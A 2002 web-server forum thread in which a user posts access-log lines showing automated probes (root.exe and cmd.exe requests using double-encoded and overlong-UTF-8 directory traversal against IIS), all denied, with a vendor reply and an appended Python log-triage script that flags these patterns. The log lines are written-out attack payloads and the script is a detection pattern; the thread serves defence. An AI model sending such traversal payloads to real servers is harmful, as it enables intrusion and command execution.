Security

 
skiward
Guest





Posted: Wed Oct 02, 2002 2:59 pm    Post subject: Security

I just set the server up last night. I have yet to share the addy with anyone. I was checking the log this morning out of curiosity, and noticed what appears to be one or several attempts to take over my system (multiple IPs). I have included a copy of the appropriate log code below. I know that all the GET attempts returned 400 or 404 calls, so they should have all been denied, but is the server secure against attempted attacks like this? Thanks

24.157.19.214 - - [02/Oct/2002:00:24:36 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.76.144.218 - - [02/Oct/2002:01:42:48 +1133] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:30 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:32 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:33 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:33 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:37 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:38 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:39 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:41 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:41 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:42 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:48 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:49 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:51 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:52 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:54 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:56 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:59 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:15:00 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:34 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:35 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:37 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:38 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:39 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:39 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:40 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:42 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:43 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

Posted: Wed Oct 02, 2002 3:14 pm    Post subject: Re: Security

skiward wrote:
I just set the server up last night. I have yet to share the addy with anyone. I was checking the log this morning out of curiosity, and noticed what appears to be one or several attempts to take over my system (multiple IPs). I have included a copy of the appropriate log code below. I know that all the GET attempts returned 400 or 404 calls, so they should have all been denied, but is the server secure against attempted attacks like this? Thanks

These attacks affect Microsoft IIS web servers.
Even though it is small, and even though Aprelium is not as huge as Microsoft, Abyss Web Server was designed to be robust and secure. The best proof is that it denied all the malicious requests you received :D
(And 6 months after the first release, with over 30000 users worldwide, no crash has been reported and only two minor URL decoding bugs were detected, and they were fixed within hours of their discovery.)
_________________
Support Team
Aprelium - http://www.aprelium.com
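
An added example, not part of either post and not Aprelium's code: a Python triage pass over access-log lines in the format quoted above. It groups probes by client, labels the encoding trick each request relies on, and lists any probe that was not answered with a 4xx status. The sample lines are constructed (request targets follow the thread's log, client addresses are placeholders), and the tag names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample: targets follow the thread's log, addresses are placeholders.
SAMPLE = """\
192.0.2.10 - - [02/Oct/2002:02:00:30 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
192.0.2.10 - - [02/Oct/2002:02:00:35 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
192.0.2.10 - - [02/Oct/2002:02:00:41 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
198.51.100.7 - - [02/Oct/2002:01:42:48 +0000] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 440
203.0.113.5 - - [02/Oct/2002:09:00:00 +0000] "GET /index.html HTTP/1.0" 200 1024
"""
# The protocol token is optional: one request line quoted in the thread lacks it.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)(?: \S+)?" (\d{3}) \S+$')

def decode_layers(path, limit=5):
    """Percent-decode until stable; return (bytes, layers of encoding removed)."""
    data, layers = path.encode("latin-1"), 0
    while layers < limit and (nxt := unquote_to_bytes(data)) != data:
        data, layers = nxt, layers + 1
    return data, layers

def classify(target):
    """Return the probe indicators present in one request target."""
    data, layers = decode_layers(target.split("?", 1)[0])
    checks = {
        "double-encoded": layers >= 2,
        "overlong-utf8": b"\xc0" in data or b"\xc1" in data,  # never valid in UTF-8
        "traversal": re.search(rb"\.\.[/\\]", data) is not None,
        "shell-target": data.lower().endswith((b"/cmd.exe", b"/root.exe")),
    }
    return {name for name, hit in checks.items() if hit}

def triage(log_text):
    """Group probes by client; list any target not answered with a 4xx status."""
    report = defaultdict(lambda: {"tags": set(), "probes": 0, "not_denied": []})
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        ip, target, status = m.groups()
        tags = classify(target)
        if tags:
            report[ip]["tags"] |= tags
            report[ip]["probes"] += 1
            if not status.startswith("4"):
                report[ip]["not_denied"].append(target)
    return dict(report)

if __name__ == "__main__":
    for ip, entry in triage(SAMPLE).items():
        print(ip, entry["probes"], sorted(entry["tags"]), entry["not_denied"] or "all denied")
```

An empty `not_denied` list for every client is the condition the original poster checked by eye: every probe was refused with 400 or 404.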
All times are GMT + 1 Hour